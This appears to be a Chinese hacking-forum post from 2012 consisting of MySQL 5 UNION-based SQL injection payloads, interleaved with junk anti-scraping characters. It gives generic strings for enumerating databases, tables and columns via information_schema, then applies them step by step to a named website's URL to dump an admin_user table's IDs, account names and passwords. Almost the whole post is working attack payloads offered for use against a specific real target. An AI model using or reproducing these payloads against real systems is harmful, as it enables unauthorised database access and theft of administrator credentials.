查库
4 F$ o# w7 _- x( D: ~4 D
( y' e$ @8 C" x) C( i. |3 bid=-1 union select 1,..,SCHEMA_NAME,n from/**/information_schema.SCHEMATA limit 1,1/*6 T( K, y$ L' _6 x
( N) S. M& N# X+ F* s |0 g0 u
查表" |! h# T; R7 G) u# l2 T" R
X6 N7 u5 u) k, A, zid=-1/**/union/**/select/**/1,TABLE_NAME,N/**/from/**/information_schema.TABLES/**/where/**/TABLE_SCHEMA=库的HEX值/**/limit/**/1,1
9 x, M2 v4 f6 M$ p3 ]% F+ G
3 @! _6 L0 |( D7 i' i查段5 ]2 O5 W( K* [8 B2 k
$ B* X4 A# z5 m9 G
id=-1/**/union/**/select/**/1,COLUMN_NAME,N/**/from/**/information_schema.COLUMNS/**/where/**/TABLE_NAME=表的HEX值/**/limit/**/1,1
1 j& x4 l/ n. j& }3 V* `( ?! ?5 Q7 E% `3 @- A
0 z( H0 n: X& L3 r1 A! N
mysql5高级注入方法暴表5 m/ y& [( o2 U( [& {3 X& G* `
) i! k& N5 U: f例子如下:) O# C( p& {5 g
9 s' Y9 _* }% E; G) W
1.爆表
1 A- a1 L+ s* u' M% N6 {. {http://www.political-security.com/ccaus_content.php?ccausid=13240/**/and/**/1=2/**/union/**/select/**/1,2,3,TABLE_NAME,5/**/From/**/information_schema.TABLES/**/Where/**/TABLE_SCHEMA=0x79645F7465616D6E6574/**/limit/**/0,1/* (0x79645F7465616D6E6574为数据库名的16进制转换yd_teamnet)
# S3 n! E3 C0 D. b6 B' N" @6 S9 @这样爆到第4个时出现了admin_user表。
- G. @9 k6 o: N% [5 C( p
# z6 n: x! g2 a2.暴字段2 G7 s5 h4 X; K- L- [! J" m) ?
http://www.political-security.com/ccaus_content.php?ccausid=13240/**/and/**/1=2/**/union/**/select/**/1,2,3,COLUMN_NAME,5/**/From/**/information_schema.COLUMNS/**/Where/**/TABLE_NAME=0x61646D696E5F75736572/**/And/**/TABLE_SCHEMA=0x79645F7465616D6E6574/**/limit/**/0,1/*5 f+ t4 d/ }, C! z0 M8 {+ C
) s% U$ V' Q' R( v# R$ T' c
5 v2 S& Z/ d3 @0 A& k2 M3.爆密码2 P9 C4 z2 t. D7 ~8 q% {. m/ ?9 N# o0 O
http://www.political-security.com/ccaus_content.php?ccausid=13240/**/and/**/1=2/**/union/**/select/**/1,2,3,concat(0x7c,ID,0x7c,ACCOUNT,0x7c,PASSWORD,0x7c),5/**/From/**/admin_user/**/limit/**/0,1/* + X; h: s- O* u: {
# ]6 [+ h8 B* ]% i. E6 l
+ u* q8 \0 ^6 K5 ?$ Q( |
|
发表于 2012-9-13 16:29:37
收藏
支持
反对